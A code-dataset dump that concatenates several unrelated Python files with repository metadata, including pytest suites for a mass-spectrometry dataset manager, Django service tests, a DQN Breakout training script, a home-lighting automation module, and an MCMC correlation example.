] | null | null | null | tests/examples/simple.py | Tiendil/coulson | 6ce12f10731930bf6931f73b752976aeda839cc4 | [
"BSD-3-Clause"
] | null | null | null |
def assigned_type_mismatch():
x = 666
x = '666'
return x
def annotation_type_mismatch(x: int = '666'):
return x
def assigned_type_mismatch_between_calls(case):
if case:
x = 666
else:
x = '666'
return x
| 12.65 | 47 | 0.588933 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 | 0.059289 |
440e4fb77e7a2dcecc9229d9e1fe37a402ae6bf6 | 10,387 | py | Python | tests/test_dataset_manager.py | METASPACE2020/sm-engine | 01d214223b36d44ba63dd5b35a162b55094b4d27 | [
"Apache-2.0"
] | 3 | 2017-07-07T00:26:37.000Z | 2018-01-23T15:51:31.000Z | tests/test_dataset_manager.py | METASPACE2020/sm-engine | 01d214223b36d44ba63dd5b35a162b55094b4d27 | [
"Apache-2.0"
] | 8 | 2017-02-17T15:25:21.000Z | 2018-06-14T10:19:22.000Z | tests/test_dataset_manager.py | METASPACE2020/sm-engine | 01d214223b36d44ba63dd5b35a162b55094b4d27 | [
"Apache-2.0"
] | 2 | 2017-10-05T14:44:44.000Z | 2018-01-31T16:33:02.000Z | from unittest.mock import patch, MagicMock, call
import json
from datetime import datetime
from copy import deepcopy
import pytest
from PIL import Image
from sm.engine import DB, ESExporter, QueuePublisher
from sm.engine.dataset_manager import SMapiDatasetManager, SMDaemonDatasetManager
from sm.engine.dataset_manager import Dataset, DatasetActionPriority, DatasetAction, DatasetStatus
from sm.engine.errors import DSIDExists
from sm.engine.queue import SM_ANNOTATE, SM_DS_STATUS
from sm.engine.tests.util import pysparkling_context, sm_config, ds_config, test_db
from sm.engine.png_generator import ImageStoreServiceWrapper
@pytest.fixture()
def fill_db(test_db, sm_config, ds_config):
upload_dt = '2000-01-01 00:00:00'
ds_id = '2000-01-01'
meta = {"meta": "data"}
db = DB(sm_config['db'])
db.insert('INSERT INTO dataset (id, name, input_path, upload_dt, metadata, config, '
'status, is_public, mol_dbs, adducts) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)',
rows=[(ds_id, 'ds_name', 'input_path', upload_dt,
json.dumps(meta), json.dumps(ds_config), DatasetStatus.FINISHED,
True, ['HMDB-v4'], ['+H'])])
db.insert("INSERT INTO job (id, db_id, ds_id) VALUES (%s, %s, %s)",
rows=[(0, 0, ds_id)])
db.insert("INSERT INTO sum_formula (id, db_id, sf) VALUES (%s, %s, %s)",
rows=[(1, 0, 'H2O')])
db.insert(("INSERT INTO iso_image_metrics (job_id, db_id, sf, adduct, iso_image_ids) "
"VALUES (%s, %s, %s, %s, %s)"),
rows=[(0, 0, 'H2O', '+H', ['iso_image_1_id', 'iso_image_2_id'])])
db.close()
def create_ds_man(sm_config, db=None, es=None, img_store=None,
action_queue=None, status_queue=None, sm_api=False):
db = db or DB(sm_config['db'])
es_mock = es or MagicMock(spec=ESExporter)
action_queue_mock = action_queue or MagicMock(QueuePublisher)
status_queue_mock = status_queue or MagicMock(QueuePublisher)
img_store_mock = img_store or MagicMock(spec=ImageStoreServiceWrapper)
if sm_api:
return SMapiDatasetManager(db=db, es=es_mock,
mode='queue', image_store=img_store_mock,
action_queue=action_queue_mock, status_queue=status_queue_mock)
else:
return SMDaemonDatasetManager(db=db, es=es_mock,
img_store=img_store_mock, mode=None,
status_queue=status_queue_mock)
def create_ds(ds_id='2000-01-01', ds_name='ds_name', input_path='input_path', upload_dt=None,
metadata=None, ds_config=None, status=DatasetStatus.NEW, mol_dbs=None, adducts=None):
upload_dt = upload_dt or datetime.now()
if not mol_dbs:
mol_dbs = ['HMDB-v4']
if not adducts:
adducts = ['+H', '+Na', '+K']
return Dataset(ds_id, ds_name, input_path, upload_dt, metadata or {}, ds_config or {},
status=status, mol_dbs=mol_dbs, adducts=adducts, img_storage_type='fs')
class TestSMapiDatasetManager:
def test_add_new_ds(self, test_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds_man.add(ds, priority=DatasetActionPriority.HIGH)
msg = {'ds_id': ds_id, 'ds_name': 'ds_name', 'input_path': 'input_path',
'action': DatasetAction.ADD, 'del_first': False}
action_queue_mock.publish.assert_has_calls([call(msg, DatasetActionPriority.HIGH)])
def test_delete_ds(self, test_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds_man.delete(ds)
msg = {'ds_id': ds_id, 'ds_name': 'ds_name', 'input_path': 'input_path', 'action': DatasetAction.DELETE}
action_queue_mock.publish.assert_has_calls([call(msg, DatasetActionPriority.HIGH)])
def test_update_ds__configs_equal_metadata_diff(self, fill_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds.metadata = {'new': 'metadata'}
ds_man.update(ds)
msg = {'ds_id': ds_id, 'ds_name': 'ds_name', 'input_path': 'input_path',
'action': DatasetAction.UPDATE}
action_queue_mock.publish.assert_has_calls([call(msg, DatasetActionPriority.HIGH)])
def test_update_ds__configs_metadata_equal__do_nothing(self, fill_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds_man.update(ds)
action_queue_mock.assert_not_called()
def test_add_ds__new_mol_db(self, fill_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds.config['databases'] = [{'name': 'HMDB'}, {'name': 'ChEBI'}]
ds_man.add(ds)
msg = {'ds_id': ds_id, 'ds_name': 'ds_name', 'input_path': 'input_path',
'action': DatasetAction.ADD, 'del_first': False}
action_queue_mock.publish.assert_has_calls([call(msg, DatasetActionPriority.DEFAULT)])
def test_add_optical_image(self, fill_db, sm_config, ds_config):
db = DB(sm_config['db'])
action_queue_mock = MagicMock(spec=QueuePublisher)
es_mock = MagicMock(spec=ESExporter)
img_store_mock = MagicMock(ImageStoreServiceWrapper)
img_store_mock.post_image.side_effect = ['opt_img_id1', 'opt_img_id2', 'opt_img_id3', 'thumbnail_id']
img_store_mock.get_image_by_id.return_value = Image.new('RGB', (100, 100))
ds_man = create_ds_man(sm_config=sm_config, db=db, es=es_mock,
img_store=img_store_mock, action_queue=action_queue_mock, sm_api=True)
ds_man._annotation_image_shape = MagicMock(return_value=(100, 100))
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
zoom_levels = [1, 2, 3]
raw_img_id = 'raw_opt_img_id'
ds_man.add_optical_image(ds, raw_img_id, [[1, 0, 0], [0, 1, 0], [0, 0, 1]],
zoom_levels=zoom_levels)
assert db.select('SELECT * FROM optical_image') == [
('opt_img_id{}'.format(i + 1), ds.id, zoom)
for i, zoom in enumerate(zoom_levels)]
assert db.select('SELECT optical_image FROM dataset where id = %s', params=(ds_id,)) == [(raw_img_id,)]
assert db.select('SELECT thumbnail FROM dataset where id = %s', params=(ds_id,)) == [('thumbnail_id',)]
class TestSMDaemonDatasetManager:
class SearchJob:
def __init__(self, *args, **kwargs):
pass
def run(self, *args, **kwargs):
pass
def test_add_ds(self, test_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
es_mock = MagicMock(spec=ESExporter)
db = DB(sm_config['db'])
try:
ds_man = create_ds_man(sm_config, db=db, es=es_mock, action_queue=action_queue_mock, sm_api=False)
ds_id = '2000-01-01'
ds_name = 'ds_name'
input_path = 'input_path'
upload_dt = datetime.now()
metadata = {}
ds = create_ds(ds_id=ds_id, ds_name=ds_name, input_path=input_path, upload_dt=upload_dt,
metadata=metadata, ds_config=ds_config)
ds_man.add(ds, search_job_factory=self.SearchJob)
DS_SEL = 'select name, input_path, upload_dt, metadata, config from dataset where id=%s'
assert db.select_one(DS_SEL, params=(ds_id,)) == (ds_name, input_path, upload_dt, metadata, ds_config)
finally:
db.close()
def test_update_ds(self, fill_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
es_mock = MagicMock(spec=ESExporter)
ds_man = create_ds_man(sm_config, es=es_mock, action_queue=action_queue_mock, sm_api=False)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
with patch('sm.engine.dataset_manager.MolecularDB') as MolecularDB:
mol_db_mock = MolecularDB.return_value
mol_db_mock.name = 'HMDB'
with patch('sm.engine.dataset_manager.MolDBServiceWrapper') as MolDBServiceWrapper:
moldb_service_wrapper_mock = MolDBServiceWrapper.return_value
moldb_service_wrapper_mock.find_db_by_id.return_value = {'name': 'HMDB-v4'}
ds_man.update(ds)
es_mock.delete_ds.assert_called_with(ds_id)
call_args = es_mock.index_ds.call_args[1].values()
assert ds_id in call_args and mol_db_mock in call_args
def test_delete_ds(self, fill_db, sm_config, ds_config):
db = DB(sm_config['db'])
action_queue_mock = MagicMock(spec=QueuePublisher)
es_mock = MagicMock(spec=ESExporter)
img_store_service_mock = MagicMock(spec=ImageStoreServiceWrapper)
ds_man = create_ds_man(sm_config, db=db, es=es_mock, img_store=img_store_service_mock,
action_queue=action_queue_mock, sm_api=False)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds_man.delete(ds)
ids = ['iso_image_{}_id'.format(id) for id in range(1, 3)]
img_store_service_mock.delete_image_by_id.assert_has_calls(
[call('fs', 'iso_image', ids[0]), call('fs', 'iso_image', ids[1])])
es_mock.delete_ds.assert_called_with(ds_id)
assert db.select_one('SELECT * FROM dataset WHERE id = %s', params=(ds_id,)) == []
| 45.358079 | 114 | 0.654472 | 7,313 | 0.704053 | 0 | 0 | 1,026 | 0.098777 | 0 | 0 | 1,517 | 0.146048 |
440ef0f506a9d49f97fe8b449ff8d92dc9b0a5ba | 2,492 | py | Python | tests/test_service_catalog/test_views/test_admin/test_settings/test_catalog/test_services/test_create.py | LaudateCorpus1/squest | 98304f20c1d966fb3678d348ffd7c5be438bb6be | [
"Apache-2.0"
] | 112 | 2021-04-21T08:52:55.000Z | 2022-03-01T15:09:19.000Z | tests/test_service_catalog/test_views/test_admin/test_settings/test_catalog/test_services/test_create.py | LaudateCorpus1/squest | 98304f20c1d966fb3678d348ffd7c5be438bb6be | [
"Apache-2.0"
] | 216 | 2021-04-21T09:06:47.000Z | 2022-03-30T14:21:28.000Z | tests/test_service_catalog/test_views/test_admin/test_settings/test_catalog/test_services/test_create.py | LaudateCorpus1/squest | 98304f20c1d966fb3678d348ffd7c5be438bb6be | [
"Apache-2.0"
] | 21 | 2021-04-20T13:53:54.000Z | 2022-03-30T21:43:04.000Z | from copy import copy
from io import BytesIO
from PIL import Image
from django.core.files.uploadedfile import InMemoryUploadedFile
from django.urls import reverse
from service_catalog.models import Service
from tests.test_service_catalog.base import BaseTest
class ServiceCreateTestCase(BaseTest):
def setUp(self):
super(ServiceCreateTestCase, self).setUp()
self.url = reverse('service_catalog:create_service')
def test_create_service(self):
data = {
"name": "new_service",
"description": "a new service",
"job_template": self.job_template_test.id,
"billing": "defined",
"billing_group_id": "",
"billing_group_is_shown": "on"
}
response = self.client.get(self.url)
self.assertEqual(200, response.status_code)
number_service_before = copy(Service.objects.all().count())
response = self.client.post(self.url, data=data)
self.assertEqual(302, response.status_code)
self.assertEqual(number_service_before + 1,
Service.objects.all().count())
def test_create_service_with_image(self):
im = Image.new(mode='RGB', size=(200, 200)) # create a new image using PIL
im_io = BytesIO() # a BytesIO object for saving image
im.save(im_io, 'JPEG') # save the image to im_io
im_io.seek(0) # seek to the beginning
image = InMemoryUploadedFile(
im_io, None, 'random-name.jpg', 'image/jpeg', len(im_io.getvalue()), None
)
data = {
"name": "new_service_with_image",
"description": "a new service",
"job_template": self.job_template_test.id,
"billing": "defined",
"billing_group_id": "",
"billing_group_is_shown": "on",
"image": image
}
number_service_before = Service.objects.all().count()
response = self.client.post(self.url, data=data, format="multipart")
self.assertEqual(302, response.status_code)
self.assertEqual(number_service_before + 1,
Service.objects.all().count())
new_service_with_image = Service.objects.get(name="new_service_with_image")
try:
self.assertIsNotNone(new_service_with_image.image.file)
except ValueError:
self.fail("Image not set")
# cleanup image after the test
new_service_with_image.image.delete()
| 38.338462 | 85 | 0.628411 | 2,228 | 0.894061 | 0 | 0 | 0 | 0 | 0 | 0 | 537 | 0.21549 |
441052dc397931ac9f5e24e600272dbb4a1bb780 | 2,940 | py | Python | deep_q_tf/main_tf.py | murtazayusuf/Reinforcement_Learning | 42c81650c4ea87e430c8ff0620d70b0ec572977f | [
"Apache-2.0"
] | null | null | null | deep_q_tf/main_tf.py | murtazayusuf/Reinforcement_Learning | 42c81650c4ea87e430c8ff0620d70b0ec572977f | [
"Apache-2.0"
] | null | null | null | deep_q_tf/main_tf.py | murtazayusuf/Reinforcement_Learning | 42c81650c4ea87e430c8ff0620d70b0ec572977f | [
"Apache-2.0"
] | null | null | null | import gym
from dqn_tf import DeepQNetwork, Agent
import numpy as np
from gym import wrappers
def preprocess(observation):
return np.mean(observation[30:, :], axis=2).reshape(180, 160, 1)
def stack_frames(stacked_frames, frame, buffer_size):
if stacked_frames is None:
stacked_frames = np.zeros((buffer_size, *frame.reshape))
for idx, _ in enumerate(stacked_frame):
stacked_frames[idx, :] = frame[0]
else:
stacked_frames[0:buffer_size-1, :] = stacked_frames[1:, :]
stacked_frames[buffer_size-1, :] = frame[0]
stacked_frames = stacked_frames.reshape(1, *frames.shape[0:2], buffer_size)
return stacked_frames
if __name__ == "__main__":
env = gym.make("Breakout-v0")
load_checkpoint = False
agent = Agent(gamma=0.99, epsilon=1.0, alpha=0.00025, input_dims=(180, 160, 4),
n_actions=3, mem_size=3000, batch_size=32)
if load_checkpoint:
agent.load_models()
scores = []
numGames = 200
stack_size = 400
score = 0
while agent.mem_cntr < 3000:
done = False
observation = env.reset()
observation = preprocess(observation)
stacked_frames = None
observation = stack_frames(stacked_frames, observation, stack_size)
while not done:
action = np.random.choice([0, 1, 2])
action += 1
observation_, reward, done, info = env.step(action)
observation_ = stack_frames(stacked_frames, preprocess(observation_),
stack_size)
action -= 1
agent.store_transition(observation, action,
reward, observation_, int(done))
observation = observation_
print("Done with random gameplay, game on")
for i in range(numGames):
done = False
if i % 10 == 0 and i > 0:
avg_score = np.mean(score[max(0, i-10):(i+1)])
print('episode', i, 'score', score, 'average_score %.3f' % avg_score,
'epsilon %.3f' % agent.epsilon)
agent.save_models()
else:
print('episode: ', i, 'score ', score)
observation = env.reset()
observation = preprocess(observation)
stacked_frames = None
observation = stack_frames(stacked_frames, observation, stack_size)
while not done:
action = agent.choose_action(observation)
action += 1
observation_, reward, done, info = env.step(action)
observation_ = stack_frames(stacked_frames, preprocess(observation_),
stack_size)
action -= 1
agent.store_transition(observation, action,
reward, observation_, int(done))
observation = observation_
agent.learn()
score += reward
scores.append(score)
| 33.033708 | 83 | 0.585034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 128 | 0.043537 |
44155aabada0f13fedb7c839b6f8e15ee94c7153 | 327 | py | Python | gz.17zwd.com/17wang.py | zzh-python/all-project | 915a47fb42d63ff3a36814992283c2f4ed8703a3 | [
"Apache-2.0"
] | 58 | 2019-03-01T08:15:19.000Z | 2022-03-28T03:16:17.000Z | gz.17zwd.com/17wang.py | zzh-python/all-project | 915a47fb42d63ff3a36814992283c2f4ed8703a3 | [
"Apache-2.0"
] | 2 | 2020-06-08T08:07:46.000Z | 2020-11-02T11:48:05.000Z | gz.17zwd.com/17wang.py | zzh-python/all-project | 915a47fb42d63ff3a36814992283c2f4ed8703a3 | [
"Apache-2.0"
] | 37 | 2019-02-26T23:30:08.000Z | 2022-01-27T05:10:18.000Z | from bs4 import BeautifulSoup
import requests
import csv
import sys
from urllib.error import HTTPError
sys.path.append("..")
import mytemp
import time
import json
url='https://gz.17zwd.com/api/shop/get-list/73'
resp=requests.get(url)
f=open('17wang.txt','w+',encoding='utf-8')
f.write(resp.text)
print(resp.text) | 21.8 | 48 | 0.730887 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 70 | 0.214067 |
4415a732b11d2612772f66097e011180e7139e5f | 1,722 | py | Python | extra/dream_examples/anticor.py | cyankaet/bumps | 427d077fd95f2d9a09eeb8677d045547061cff42 | [
"MIT"
] | 44 | 2015-03-28T06:48:43.000Z | 2022-01-09T11:29:00.000Z | extra/dream_examples/anticor.py | cyankaet/bumps | 427d077fd95f2d9a09eeb8677d045547061cff42 | [
"MIT"
] | 68 | 2015-08-21T11:28:54.000Z | 2022-03-30T22:14:13.000Z | extra/dream_examples/anticor.py | cyankaet/bumps | 427d077fd95f2d9a09eeb8677d045547061cff42 | [
"MIT"
] | 27 | 2015-06-22T19:25:27.000Z | 2021-06-15T18:20:06.000Z | #!/usr/bin/env python
"""
Example model with strong correlations between the fitted parameters.
We use a*x = y + N(0,1) made complicated by defining a=p1+p2.
The expected distribution for p1 and p2 will be uniform, with p2 = a-p1 in
each sample. Because this distribution is inherently unbounded, artificial
bounds are required on a least one of the parameters for finite duration
simulations.
The expected distribution for p1+p2 can be determined from the linear model
y = a*x. This is reported along with the values estimated from MCMC.
"""
from __future__ import print_function
from pylab import * # Numeric functions and plotting
from dream import * # sampler functions
# Create the correlation function and generate some fake data
x = linspace(-1., 1, 40)
fn = lambda p: sum(p)*x
bounds=(-20,-inf),(40,inf)
sigma = 1
data = fn((1,1)) + randn(*x.shape)*sigma # Fake data
# Sample from the posterior density function
n=2
model = Simulation(f=fn, data=data, sigma=sigma, bounds=bounds,
labels=["x","y"])
sampler = Dream(model=model,
population=randn(5*n,4,n),
thinning=1,
draws=20000,
)
mc = sampler.sample()
mc.title = 'Strong anti-correlation'
# Create a derived parameter without the correlation
mc.derive_vars(lambda p: (p[0]+p[1]), labels=['x+y'])
# Compare the MCMC estimate for the derived parameter to a least squares fit
from bumps.wsolve import wpolyfit
poly = wpolyfit(x,data,degree=1,origin=True)
print("x+y from linear fit", poly.coeff[0], poly.std[0])
points,logp = mc.sample(portion=0.5)
print("x+y from MCMC",mean(points[:,2]), std(points[:,2],ddof=1))
# Plot the samples
plot_all(mc, portion=0.5)
show()
| 31.888889 | 76 | 0.699187 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 931 | 0.54065 |
4415ff54efa6b8573163a01345a7d4c0fe9b4b4b | 542 | py | Python | tests/plugins/test_brittv.py | fuglede/streamlink | 2661d40164986f979edc2e6867f8daeceba73a44 | [
"BSD-2-Clause"
] | null | null | null | tests/plugins/test_brittv.py | fuglede/streamlink | 2661d40164986f979edc2e6867f8daeceba73a44 | [
"BSD-2-Clause"
] | null | null | null | tests/plugins/test_brittv.py | fuglede/streamlink | 2661d40164986f979edc2e6867f8daeceba73a44 | [
"BSD-2-Clause"
] | null | null | null | import unittest
from streamlink.plugins.brittv import BritTV
class TestPluginBritTV(unittest.TestCase):
def test_can_handle_url(self):
should_match = [
'http://brittv.co.uk/watch/?channel=1',
]
for url in should_match:
self.assertTrue(BritTV.can_handle_url(url))
def test_can_handle_url_negative(self):
should_not_match = [
'https://example.com/index.html',
]
for url in should_not_match:
self.assertFalse(BritTV.can_handle_url(url))
| 27.1 | 56 | 0.643911 | 477 | 0.880074 | 0 | 0 | 0 | 0 | 0 | 0 | 70 | 0.129151 |
44161fe721c4935dde56518cd9d4e7cbde6b5a22 | 6,833 | py | Python | src/Modules/Lighting/lighting.py | bopopescu/PyHouse_1 | 6444ed0b4c38ab59b9e419e4d54d65d598e6a54e | [
"MIT"
] | 1 | 2016-09-21T19:30:21.000Z | 2016-09-21T19:30:21.000Z | src/Modules/Lighting/lighting.py | bopopescu/PyHouse_1 | 6444ed0b4c38ab59b9e419e4d54d65d598e6a54e | [
"MIT"
] | null | null | null | src/Modules/Lighting/lighting.py | bopopescu/PyHouse_1 | 6444ed0b4c38ab59b9e419e4d54d65d598e6a54e | [
"MIT"
] | 1 | 2020-07-23T11:13:36.000Z | 2020-07-23T11:13:36.000Z | """
-*- test-case-name: PyHouse.Modules.Lighting.test.test_lighting -*-
@name: PyHouse/src/Modules/Lighting/lighting.py
@author: D. Brian Kimmel
@contact: D.BrianKimmel@gmail.com
@copyright: (c) 2010-2016 by D. Brian Kimmel
@note: Created on Apr 2, 2010
@license: MIT License
@summary: Handle the home lighting system automation.
This is called from 'house'.
for every house.
PyHouse.House.Lighting.
Buttons
Controllers
Lights
"""
# Import system type stuff
import xml.etree.ElementTree as ET
# Import PyHouse files
from Modules.Core.data_objects import LightingData, ControllerData
from Modules.Families.family_utils import FamUtil
from Modules.Lighting.lighting_actions import Utility as actionUtility
from Modules.Lighting.lighting_buttons import API as buttonsAPI
from Modules.Lighting.lighting_controllers import API as controllersAPI
from Modules.Lighting.lighting_lights import API as lightsAPI
from Modules.Computer import logging_pyh as Logger
LOG = Logger.getLogger('PyHouse.Lighting ')
class Utility(object):
"""Commands we can run from high places.
"""
def _setup_lighting(self, p_pyhouse_obj):
"""
Find the lighting information
Config file version 1.4 moved the lighting information into a separate LightingSection
"""
l_root = p_pyhouse_obj.Xml.XmlRoot
l_lighting_xml = None
try:
l_house_xml = l_root.find('HouseDivision')
except AttributeError as e_err:
LOG.error('House Division is missing in Config file. {}'.format(e_err))
l_house_xml = l_root
try:
l_lighting_xml = l_house_xml.find('LightingSection')
except AttributeError as e_err:
LOG.warning('Old version of Config file found. No LightingSection {}'.format(e_err))
# We have an old version
if l_lighting_xml is None or l_lighting_xml == 'None':
l_lighting_xml = l_house_xml
return l_lighting_xml
def _read_buttons(self, p_pyhouse_obj, p_xml):
try:
l_xml = p_xml.find('ButtonSection')
l_ret = buttonsAPI.read_all_buttons_xml(p_pyhouse_obj, l_xml)
except AttributeError as e_err:
l_ret = {}
l_msg = 'No Buttons found {}'.format(e_err)
LOG.warning(l_msg)
return l_ret
def _read_controllers(self, p_pyhouse_obj, p_xml):
try:
l_xml = p_xml.find('ControllerSection')
l_ret = controllersAPI.read_all_controllers_xml(p_pyhouse_obj)
except AttributeError as e_err:
l_ret = {}
l_msg = 'No Controllers found {}'.format(e_err)
LOG.warning(l_msg)
return l_ret
def _read_lights(self, p_pyhouse_obj, p_xml):
try:
l_xml = p_xml.find('LightSection')
l_ret = lightsAPI.read_all_lights_xml(p_pyhouse_obj, l_xml)
except AttributeError as e_err:
l_ret = {}
l_msg = 'No Lights found: {}'.format(e_err)
LOG.warning(l_msg)
return l_ret
def _read_lighting_xml(self, p_pyhouse_obj):
"""
Get all the lighting components for a house
Config file version 1.4 moved the lighting information into a separate LightingSection
"""
l_xml = p_pyhouse_obj.Xml.XmlRoot
l_lighting_xml = self._setup_lighting(p_pyhouse_obj) # in case of old style file
p_pyhouse_obj.House.Lighting = LightingData()
l_xml = l_xml.find('HouseDivision')
if l_xml is None:
return p_pyhouse_obj.House.Lighting
l_xml = l_xml.find('LightingSection')
if l_xml is None:
return p_pyhouse_obj.House.Lighting
p_pyhouse_obj.House.Lighting.Controllers = self._read_controllers(p_pyhouse_obj, l_lighting_xml)
p_pyhouse_obj.House.Lighting.Buttons = self._read_buttons(p_pyhouse_obj, l_lighting_xml)
p_pyhouse_obj.House.Lighting.Lights = self._read_lights(p_pyhouse_obj, l_lighting_xml)
# print(PrettyFormatAny.form(p_pyhouse_obj.House.Lighting, 'Lighting'))
return p_pyhouse_obj.House.Lighting
@staticmethod
def _write_lighting_xml(p_pyhouse_obj, p_house_element):
"""
@param p_pyhouse_obj: is the whole PyHouse Object
@param p_house_element: is the XML
"""
l_lighting_xml = ET.Element('LightingSection')
try:
l_xml = lightsAPI.write_all_lights_xml(p_pyhouse_obj)
l_lighting_xml.append(l_xml)
l_lighting_xml.append(buttonsAPI.write_buttons_xml(p_pyhouse_obj))
l_lighting_xml.append(controllersAPI.write_all_controllers_xml(p_pyhouse_obj))
except AttributeError as e_err:
l_msg = 'ERROR-109: {}'.format(e_err)
LOG.error(l_msg)
p_house_element.append(l_lighting_xml)
return l_lighting_xml
class API(Utility):
def __init__(self, p_pyhouse_obj):
p_pyhouse_obj.House.Lighting = LightingData()
# p_pyhouse_obj.House.Lighting.Controllers = ControllerData()
self.m_pyhouse_obj = p_pyhouse_obj
LOG.info('Initialized')
def LoadXml(self, p_pyhouse_obj):
""" Load the Lighting xml info.
"""
self._read_lighting_xml(p_pyhouse_obj)
def SaveXml(self, p_xml):
""" Save the Lighting section.
It will contain several sub-sections
"""
l_xml = Utility._write_lighting_xml(self.m_pyhouse_obj, p_xml)
p_xml.append(l_xml)
LOG.info("Saved Lighting XML.")
return p_xml
def Start(self):
"""Allow loading of sub modules and drivers.
"""
self.m_pyhouse_obj.APIs.House.FamilyAPI.start_lighting_families(self.m_pyhouse_obj)
LOG.info("Started.")
def Stop(self):
"""Allow cleanup of all drivers.
"""
LOG.info("Stopping all lighting families.")
# self.m_pyhouse_obj.APIs.House.FamilyAPI.stop_lighting_families(self.m_pyhouse_obj)
LOG.info("Stopped.")
def ChangeLight(self, p_light_obj, p_source, p_new_level, _p_rate = None):
"""
Set an Insteon controlled light to a value - On, Off, or Dimmed.
Called by:
web_controlLights
schedule
"""
l_light_obj = actionUtility._find_full_obj(self.m_pyhouse_obj, p_light_obj)
try:
LOG.info("Turn Light {} to level {}, DeviceFamily:{}".format(l_light_obj.Name, p_new_level, l_light_obj.DeviceFamily))
l_api = FamUtil._get_family_device_api(self.m_pyhouse_obj, l_light_obj)
l_api.ChangeLight(l_light_obj, p_source, p_new_level)
except Exception as e_err:
LOG.error('ERROR - {}'.format(e_err))
# ## END DBK
| 37.543956 | 130 | 0.657837 | 5,714 | 0.836236 | 0 | 0 | 744 | 0.108883 | 0 | 0 | 2,207 | 0.322991 |
44162499513d25160459c56fac5a7f8e586c1da1 | 2,244 | py | Python | tests/math/unary/test_hyperbolictrig.py | Zac-HD/MyGrad | fbc375d28842e1af1ebaf62ca6da479609a6baf6 | [
"MIT"
] | null | null | null | tests/math/unary/test_hyperbolictrig.py | Zac-HD/MyGrad | fbc375d28842e1af1ebaf62ca6da479609a6baf6 | [
"MIT"
] | 2 | 2017-08-02T01:47:51.000Z | 2017-08-12T22:34:50.000Z | tests/math/unary/test_hyperbolictrig.py | Zac-HD/MyGrad | fbc375d28842e1af1ebaf62ca6da479609a6baf6 | [
"MIT"
] | null | null | null | import numpy as np
from mygrad import cosh, coth, csch, sech, sinh, tanh
from tests.wrappers.uber import backprop_test_factory, fwdprop_test_factory
def _is_nonzero(x):
return np.all(np.abs(x.data) > 1e-8)
@fwdprop_test_factory(
mygrad_func=sinh, true_func=np.sinh, index_to_bnds={0: (-10, 10)}, num_arrays=1
)
def test_sinh_fwd():
pass
@backprop_test_factory(
mygrad_func=sinh, true_func=np.sinh, index_to_bnds={0: (-10, 10)}, num_arrays=1
)
def test_sinh_backward():
pass
@fwdprop_test_factory(
mygrad_func=cosh, true_func=np.cosh, index_to_bnds={0: (-10, 10)}, num_arrays=1
)
def test_cosh_fwd():
pass
@backprop_test_factory(
mygrad_func=cosh,
true_func=np.cosh,
index_to_bnds={0: (-10, 10)},
atol=1e-5,
num_arrays=1,
)
def test_cosh_backward():
pass
@fwdprop_test_factory(
mygrad_func=tanh, true_func=np.tanh, index_to_bnds={0: (-10, 10)}, num_arrays=1
)
def test_tanh_fwd():
pass
@backprop_test_factory(
mygrad_func=tanh,
true_func=np.tanh,
index_to_bnds={0: (-10, 10)},
atol=1e-5,
num_arrays=1,
)
def test_tanh_backward():
pass
@fwdprop_test_factory(
mygrad_func=csch,
true_func=lambda x: 1 / np.sinh(x),
index_to_bnds={0: (0.001, 10)},
num_arrays=1,
)
def test_csch_fwd():
pass
@backprop_test_factory(
mygrad_func=csch,
true_func=lambda x: 1 / np.sinh(x),
index_to_bnds={0: (0.001, 10)},
num_arrays=1,
)
def test_csch_backward():
pass
@fwdprop_test_factory(
mygrad_func=sech,
true_func=lambda x: 1 / np.cosh(x),
index_to_bnds={0: (-10, 10)},
num_arrays=1,
)
def test_sech_fwd():
pass
@backprop_test_factory(
mygrad_func=sech,
true_func=lambda x: 1 / np.cosh(x),
index_to_bnds={0: (0.001, 10)},
atol=1e-5,
num_arrays=1,
)
def test_sech_backward():
pass
@fwdprop_test_factory(
mygrad_func=coth,
true_func=lambda x: 1 / np.tanh(x),
index_to_bnds={0: (-10, 10)},
assumptions=_is_nonzero,
num_arrays=1,
)
def test_coth_fwd():
pass
@backprop_test_factory(
mygrad_func=coth,
true_func=lambda x: 1 / np.tanh(x),
index_to_bnds={0: (0.001, 10)},
atol=1e-5,
num_arrays=1,
)
def test_coth_backward():
pass
| 18.393443 | 83 | 0.667558 | 0 | 0 | 0 | 0 | 1,995 | 0.889037 | 0 | 0 | 0 | 0 |
441676381cae9515b51fa0e630497ee23d1f197b | 16,667 | py | Python | hwrt/data_analyzation_metrics.py | MartinThoma/hwrt | 7b274fa3022292bb1215eaec99f1826f64f98a07 | [
"MIT"
] | 65 | 2015-04-08T12:11:22.000Z | 2022-02-28T23:46:53.000Z | hwrt/data_analyzation_metrics.py | MartinThoma/hwrt | 7b274fa3022292bb1215eaec99f1826f64f98a07 | [
"MIT"
